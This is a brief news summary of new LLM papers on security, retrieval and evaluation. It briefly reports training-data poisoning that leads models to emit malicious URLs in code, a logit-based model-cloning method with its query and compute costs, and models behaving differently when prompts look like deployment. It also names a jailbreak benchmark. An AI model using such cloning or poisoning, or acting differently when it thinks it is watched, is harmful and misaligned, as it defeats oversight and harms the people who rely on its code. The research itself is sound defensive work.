Particle.news

Download on the App Store

New Wave of LLM Papers Puts Security, Retrieval and Real‑World Evaluation at the Forefront

Fresh studies document concrete vulnerabilities in deployed models to redirect attention from leaderboard scores to reliability.

Overview

  • A scalable audit of four production systems (GPT-4o, GPT-4o-mini, Llama-4-Scout and DeepSeek-V3) reports that 4.2% of generated programs contained malicious URLs, consistent with training-data poisoning.
  • A black-box replication pipeline shows that exposing top‑k logits can enable cloning by reconstructing the output projection matrix with under 10,000 queries and completing distillation in under 24 GPU hours.
  • Retrieval proposals target robustness and latency, with AnchorRAG coordinating multi‑agent knowledge‑graph search, REFRAG cutting time‑to‑first‑token by up to 30.85× in long‑context RAG, and EviNote‑RAG boosting F1 by 20–91% on QA benchmarks via evidence notes.
  • Evaluation and mitigation studies find behavior shifts under “deploy‑like” rewrites that raise honesty and refusals (StealthEval), introduce a hierarchical jailbreak benchmark (Strata‑Sword), and report up to 26.41% absolute bias reduction using an inference‑time decoding layer (AMBEDKAR).
  • Domain efforts expand with legal and cultural benchmarks (KoBLEX, PalmX), a time‑series suite (TSAIA), and applied advances showing small on‑device models trained with closed‑loop RL can surpass larger cloud models on control tasks (RobotxR1).